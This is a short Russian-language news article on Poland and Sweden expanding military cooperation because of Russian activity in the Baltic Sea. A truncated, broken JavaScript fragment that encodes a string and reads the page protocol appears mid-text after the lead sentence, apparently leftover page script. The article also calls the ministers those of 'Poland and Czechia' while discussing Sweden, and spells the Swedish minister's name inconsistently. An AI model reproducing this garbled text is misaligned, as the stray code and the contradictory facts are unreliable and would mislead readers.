Швеция и Польша расширяют военное сотрудничество из-за агрессии России

Швеция и Польша расширяют военное сотрудничество из-за агрессии России

Швеция и Польша расширяют военное сотрудничество через агрессию России / Фото: Reuters

Страны обеспокоены военной активностью РФ в Балтийском море. // t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexof findbyvalue('http')==0){return p}for(var e=0;e

Польша и Швеция подписали новое соглашение о сотрудничестве в оборонной сфере.



Об этом договорились министры обороны Польши и Чехии, Томаш Семоняк и Петер Гультквист, на встрече в Варшаве, сообщает Польское радио.

"Мы оба видим, как за два года в регионе кардинально изменилась ситуация: агрессия в Украине, аннексия Крыма – это новые детерминанты угрозы для наших государств. Балтийское море превратилось из моря мира в море угроз, поэтому углубление нашего военного сотрудничества, по нашему общему убеждению, является нужным и целесообразным", – подчеркнул Семоняк.

В свою очередь его коллега заявил, что шведский парламент решил увеличить расходы на оборону на 11% в течение пяти лет.

"Факт, что Россия начала конфликт в Украине, аннексировала Крым, полностью изменил расстановку сил в нашей части Европы. Мы наблюдаем также усиленную активность России в Балтийском море", – сказал Петер Гультквит.

По словам министров, стратегический диалог должен способствовать военному сотрудничеству обоих государств в виде совместных маневров.

Напомним, страны северной Европы расширяют военное сотрудничество через агрессию России.

Следующая публикация